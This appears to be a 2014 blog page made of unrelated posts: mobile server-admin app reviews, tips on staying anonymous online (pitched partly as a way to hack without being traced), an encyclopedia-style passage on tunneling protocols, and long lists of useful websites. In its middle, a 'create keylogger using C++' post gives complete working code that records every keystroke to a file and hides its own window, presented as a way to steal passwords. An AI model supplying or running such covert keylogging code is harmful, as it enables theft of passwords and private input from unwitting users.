Saturday 2 August 2014

Top Server And Admin Applications For Android And IPhone: android-vs-ios

No matter what is the nature of your work,
whether you are a webmaster, server
administrator or an IT professional, the
ability is to deal with your admin tasks and
the server is your utmost priority. In this
article, we are going to discuss the top five
server and admin applications that is suitable
to your iPhone, and Android mobile gadgets.
1. AndFTP
For those who are not yet familiar about
AndFTP it serves as an SCP, FTP, and SFTP
and FTPS client. Moreover, AndFTP let the
user to handle number of FTP configurations;
as well it provides features like download
and upload and sharing management. As well
AndFTP allows the user to delete, rename,
open, or update permissions, and also to run
custom commands.
2. ConnectBot
ConnectBot act as a Secure Shell client
intended for Android users, as well it creates
secure connection through using a shell even
the gadget is in the remote distance to
transmit files and data back and forth to
your phone. Furthermore, ConnectBot let the
user to handle numbers ofSSH sessions, as
well allow them to copy and paste between
other applications, and to build protected
tunnels.
Jack Wallen an award winning writer of
Linux.com stated that ConnectBot is a must
have app, in fact he recommend this app to
the Linux admin who are using Android
phone.
3. ServerMonitor
ServerMonitor is an app intended for iPhone
users, it uses SSH protocol to link machines
remotely to assists with your workstation and
server monitoring requirements. The multi-
protocol supports include the following: FTP,
SMTP, HTTP, IMAP, MySQL, HTTPS, DNS,
POP3, Ping and SSH.
Although there is no much review regarding
this app but the general response seems to
be optimistic. Based on the feedback from
the users one thing they want to be added in
this app on the next update is the ability to
view all list of running processes and to view
how much memory they occupy.
4. iSSH – SSH / VNC Console
The iSSH – SSH / VNC Console for iPhone is
an SSH and Telnet emulator that is fully
featured with ANSI, VT102, VT100, and
VT220 incorporated with tunneled X server,
RDP client and VNC client. As well this app
has the ability to carry simultaneous
connections with total terminal
compatibility, intuitive user interface, and
configurable macro and key options.
5. Network Utility
Network Utility let the user to check the
status of their server or websites through
their Apple device or iPhone anywhere.
Network Utility is fully featured with TCP/IP
Port Scan, ping (ICMP Echo), IP address
information, Whois Query, GeoIP Lookup,
and more.
For me this another iPhone app that seems
to be gathering mixed reviews. Some user
approved its efficiency and its user
friendliness, but other user rising complaint
that this app causes their device to freeze up
that can only be fixed through restarting the
device. Users as well object about the
absence of subnet scans. The decision is still
out on this app. But the best thing we need
to do is to try this and experience how it
holds up.

Ways To Be Anonymous Online

Want to be anonymous online to view
blocked websites, protect your self from
hackers or want to hack some one and stay
un-traced?. In the following post i will
explain 4 easy ways by which you can stay
anonymous online!
1. Using Proxies
A proxy is an address ( IP address) of a
Server (proxy server) that is placed between
your computer and the Internet The
advantage ofa proxy is that your real IP
address is Hidden so when you hack your
giving the IP address ofthe proxy sever and
not your real IP address Same way if your a
normal Internet user the hacker won't get
your real IP but the IP of the proxy
server.You can use it to enter site or forum
that you areIP is banned. To know more
about proxies les me know above this post
and I will post a full tutotial about it.
2. Using Tor
Tor-proxy is a free proxy-server service that
Internet users can useto hide their IP address
while surfing the Web. Tor (The Onion
Router) is free software for enabling online
anonymity. Tor directs Internet traffic
through a free, worldwide volunteer network
consisting of more than three thousand
relays to conceal auser's location or usage
from anyone. I have written a complete How
to guide on how to use tor - just let me know
if you need it
3. SSH Tunneling
SSH tunnel is an encrypted tunnel created
through an SSH protocol connection. SSH
tunnels may be used to tunnel unencrypted
trafficover a network through an encrypted
channel.In easy language,you can surf net
withoutbeing monitored and even surf
blocked sites too. To know more about SSH
and SSH tunneling let me know if you would
like to read: SSH tunneling guide.
4. Using VPN
Virtual Private Network. Basically it’s a
private network which lets users to connect
to other users orremote sites using a public
network usually internet. It uses “virtual”
connections routed through the Internet
from the company’s private network to the
remote site or employee instead of physical
connections. In short, it is private network
constructed within a public network
infrastructure,such as the global Internet.
The Biggest difference between proxy and
VPN is everything in a VPN is encrypted
which gives an additional layer of security.
There are some paid Andfree VPN services.

Tunneling protocol

Computer networks use a tunneling protocol
when one network protocol (the delivery
protocol) encapsulates a different payload
protocol. By using tunneling one can (for
example) carry a payload over an
incompatible delivery-network, or provide a
secure path through an untrusted network.
Tunneling typically contrasts with a layered
protocol model such as those of OSI or TCP/
IP. Typically, the delivery protocol operates
at an equal or higher level in the model than
does the payload protocol.
To understand a particular protocol stack,
network engineers must understand both the
payload and delivery protocol sets.
As an example of network layer over network
layer, Generic Routing Encapsulation (GRE), a
protocol running over IP (IP Protocol
Number 47), often serves to carry IP packets,
with RFC 1918 private addresses, over the
Internet using delivery packets with public IP
addresses. In this case, the delivery and
payload protocols are compatible, but the
payload addresses are incompatible with
those of the delivery network.
In contrast, an IP payload might believe it
sees a data link layer delivery when it is
carried inside the Layer 2 Tunneling Protocol
(L2TP), which appears to the payload
mechanism as a protocol of the data link
layer. L2TP, however, actually runs over the
transport layer using User Datagram Protocol
(UDP) over IP. The IP in the delivery protocol
could run over any data-link protocol from
IEEE 802.2 over IEEE 802.3 (i.e., standards-
based Ethernet) to the Point-to-Point
Protocol (PPP) over a dialup modem link.
Tunneling protocols may use data encryption
to transport insecure payload protocols over
a public network (such as the Internet),
thereby providing VPN functionality. IPsec
has an end-to-end Transport Mode, but can
also operate in a tunneling mode through a
trusted security gateway.
Secure Shell tunneling[edit]
A Secure Shell (SSH) tunnel consists of an
encrypted tunnel created through an SSH
protocol connection. Users may set up SSH
tunnels to transfer unencrypted traffic over a
network through an encrypted channel. For
example, Microsoft Windows machines can
share files using the Server Message Block
(SMB) protocol, a non-encrypted protocol. If
one were to mount a Microsoft Windows file-
system remotely through the Internet,
someone snooping on the connection could
see transferred files. To mount the Windows
file-system securely, one can establish a SSH
tunnel that routes all SMB traffic to the
remote fileserver through an encrypted
channel. Even though the SMB protocol itself
contains no encryption, the encrypted SSH
channel through which it travels offers
security.
Reverse ssh tunnel
To set up an SSH tunnel, one configures an
SSH client to forward a specified local port
to a port on the remote machine. Once the
SSH tunnel has been established, the user
can connect to the specified local port to
access the network service. The local port
need not have the same port number as the
remote port.
SSH tunnels provide a means to bypass
firewalls that prohibit certain Internet
services – so long as a site allows outgoing
connections. For example, an organization
may prohibit a user from accessing Internet
web pages (port 80) directly without passing
through the organization's proxy filter (which
provides the organization with a means of
monitoring and controlling what the user
sees through the web). But users may not
wish to have their web traffic monitored or
blocked by the organization's proxy filter. If
users can connect to an external SSH server,
they can create a SSH tunnel to forward a
given port on their local machine to port 80
on a remote web-server. To access the
remote web-server, users would point their
browser to the local port at http://localhost/
Some SSH clients support dynamic port
forwarding that allows the user to create a
SOCKS 4/5 proxy. In this case users can
configure their applications to use their local
SOCKS proxy server. This gives more
flexibility than creating a SSH tunnel to a
single port as previously described. SOCKS
can free the user from the limitations of
connecting only to a predefined remote port
and server. If an application doesn't support
SOCKS, one can use a "socksifier" to redirect
the application to the local SOCKS proxy
server. Some "socksifiers", such as Proxycap,
support SSH directly, thus avoiding the need
for a SSH client.

HOW TO CREATE KEYLOGGER USING C++.?

Any Idea about keylogger..?
Keylogger is a software program that is used
to monitor and log each of the keys a user
types into a computer keyboard.In this way
keylogger steals user information such as
passwords and sends it to the Hacker.
There are many Key loggers in the market ,
but never mind, we are programmers and we
develop our version of the tool.
copy the below code, compile and run it.
Once you run the program you can see the
“log” file created along with the executable
ones
CODE :
# include <iostream>
#include <fstream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();
int main()
{
Stealth();
char i;
while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}
int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
cout << key_stroke << endl;
if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_<span
class="la4l7p" id="la4l7p_5">HOME</
span>)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke ==
110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);
fclose (OUTPUT_FILE);
return 0;
}
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClas
s", NULL);
ShowWindow(Stealth,0);
}
Test it on your PC and have fun

Useful Website 2

ctrlq.org/screenshots – for capturing
screenshots of web pages on mobile and
desktops.
dictation.io – online voice recognition in the
browser itself.
Most Useful Websiteszerodollarmovies.com –
find full-length movies on YouTube.
screenr.com – record movies of your
desktop and send them straight to YouTube.
goo.gl – shorten long URLs and convert URLs
into QR codes.
unfurlr.come – find the original URL that’s
hiding behind a short URL.
qClock – find the local time of a city using
Google Maps.
copypastecharacter.com – copy special
characters that aren’t on your keyboard.
codeacademy.com – the best place to learn
coding online.
lovelycharts.com – create flowcharts,
network diagrams, sitemaps, etc.
iconfinder.com – find icons of all sizes.
office.com – download templates, clipart and
images for your Office documents.
followupthen.com – the easiest way to setup
email reminders.
jotti.org – scan any suspicious file or email
attachment for viruses.
wolframalpha.com – gets answers directly
without searching – see more wolfram tips.
printwhatyoulike.com – print web pages
without the clutter.
ctrlq.save – save online files to Dropbox or
Google Drive directly.
ctrql.rss – a search engine for RSS feeds.
e.ggtimer.com – a simple online timer for
your daily needs.
coralcdn.org – if a site is down due to heavy
traffic, try accessing it through coral CDN.
random.org – pick random numbers, flip
coins, and more.
pdfescape.com – lets you can quickly edit
PDFs in the browser itself.
tubemogul.com – simultaneously upload
videos to YouTube and other video sites.
scr.im – share you email address online
without worrying about spam.
spypig.com – now get read receipts for your
email.
myfonts.com/WhatTheFont – quickly
determine the font name from an image.
google.com/webfonts – a good collection of
open source fonts.
regex.info – find data hidden in your
photographs – see more EXIF tools.
livestream.com – broadcast events live over
the web, including your desktop screen.
iwantmyname.com – helps you search
domains across all TLDs.
homestyler.com – design from scratch or re-
model your home in 3d.
join.me – share you screen with anyone over
the web.
onlineocr.net – recognize text from scanned
PDFs – see other OCR tools.
flightstats.com – Track flight status at
airports worldwide.
wetransfer.com – for sharing really big files
online.
hundredzeros.com – the site lets you
download free Kindle books.
polishmywriting.com – check your writing
for spelling or grammatical errors.
marker.to – easily highlight the important
parts of a web page for sharing.
typewith.me – work on the same document
with multiple people.
whichdateworks.com – planning an event?
find a date that works for all.
everytimezone.com – a less confusing view
of the world time zones.
gtmetrix.com – the perfect tool for
measuring your site performance online.
noteflight.com – print music sheets, write
your own music online (review).
imo.im – chat with your buddies on Skype,
Facebook, Google Talk, etc. from one place.
translate.google.com – translate web pages,
PDFs and Office documents.
kleki.com – create paintings and sketches
with a wide variety of brushes.
similarsites.com – discover new sites that are
similar to what you like already.
wordle.net – quick summarize long pieces of
text with tag clouds.
bubbl.us – create mind-maps, brainstorm
ideas in the browser.
kuler.adobe.com – get color ideas, also
extract colors from photographs.
liveshare.com – share your photos in an
album instantly.
lmgtfy.com – when your friends are too lazy
to use Google on their own.
midomi.com – when you need to find the
name of a song.
google.com/history – see your past searches,
also among most important Google URLs
bing.com/images – automatically find
perfectly-sized wallpapers for mobiles.
faxzero.com – send an online fax for free –
see more fax services.
feedmyinbox.com – get RSS feeds as an email
newsletter.
ge.tt – qiuckly send a file to someone, they
can even preview it before downloading.
pipebytes.com – transfer files of any size
without uploading to a third-party server.
tinychat.com – setup a private chat room in
micro-seconds.
privnote.com – create text notes that will
self-destruct after being read.
boxoh.com – track the status of any
shipment on Google Maps – alternative.
mondrian.io – create vector drawings in the
browser
draw.io – create diagrams and flowcharts in
the browser, export your drawings to Google
Drive and Dropbox.
downforeveryoneorjustme.com – find if your
favorite website is offline or not?
ewhois.com – find the other websites of a
person with reverse Analytics lookup.
whoishostingthis.com – find the web host of
any website.
labnol.org – software tutorials and how-to
guides.
disposablewebpage.com – create a temporary
web page that self-destruct.
urbandictionary.com – find definitions of
slangs and informal words.
seatguru.com – consult this site before
choosing a seat for your next flight.
unsplash.com – download images absolutely
free.
zoom.it – view very high-resolution images
in your browser without scrolling.
scribblemaps.com – create custom Google
Maps easily.
alertful.com – quickly setup email reminders
for important events.
picmonkey.com – Picnik is offline but
PicMonkey is an even better image editor.
formspring.me – you can ask or answer
personal questions here.
sumopaint.com – an excellent layer-based
online image editor.
snopes.com – find if that email offer you
received is real or just another scam.
typingweb.com – master touch-typing with
these practice sessions.
mailvu.com – send video emails to anyone
using your web cam.
timerime.com – create timelines with audio,
video and images.
stupeflix.com – make a movie out of your
images, audio and video clips.
safeweb.norton.com – check the trust level
of any website.
teuxdeux.com – a beautiful to-do app that
looks like your paper dairy.
deadurl.com – you’ll need this when your
bookmarked web pages are deleted.
minutes.io – quickly capture effective notes
during meetings.
youtube.com/leanback – Watch YouTube
channels in TV mode.
youtube.com/disco – quickly create a video
playlist of your favorite artist.
talltweets.com – Send tweets longer than 140
characters.
pancake .io – create a free and simple
website using your Dropbox account.
builtwith.com – find the technology stack to
know everything about a website.
woorank.com – research a website from the
SEO perspective.
mixlr.com – broadcast live audio over the
web.
radbox.me – bookmark online videos and
watch them later (review).
tagmydoc.com – add QR codes to your
documents and presentations (review).
notes.io – the easiest way to write short text
notes in the browser.
ctrlq.org/html-mail – send rich-text mails to
anyone, anonymously.
fiverr.com – hire people to do little things
for $5.
otixo.com – easily manage your online files
on Dropbox, Google Docs, etc.
ifttt.com – create a connection between all
your online accounts.

Internet Useful Website

virustotal.com – scan any suspicious file or
email attachment for viruses.
isnsfw.com – when you wish to share a NSFW
page but with a warning.
truveo.com – the best place for searching
web videos.
tabbloid.com – your favorite blogs delivered
as PDFs.
warrick.cs.odu.edu – you’ll need this when
your bookmarked web pages are deleted.
tempalias.com – generate temporary email
aliases, better than disposable email.
whisperbot.com – send an email without
using your own account.
errorlevelanalysis.com – find whether a
photo is real or a photoshopped one.
google.com/dictionary – get word meanings,
pronunciations and usage examples.
wobzip.org – unzip your compressed files
online.
namemytune.com – when you need to find
the name of a song.
snapask.com – use email on your phone to
find sports scores, read Wikipedia, etc.
pastebin.com – the site has been blocked in
India.
encrypted.google.com – Google now
redirects all logged-in users to the https
version of google.com by default so this is
no longer necessary.
bounceapp.com – replace this with a version
that works on mobile.
dabbleboard.com – a online virtual
whiteboard that will shut down in August
2012.
chipin.com – helps you raise funds online for
an event or a cause (closed).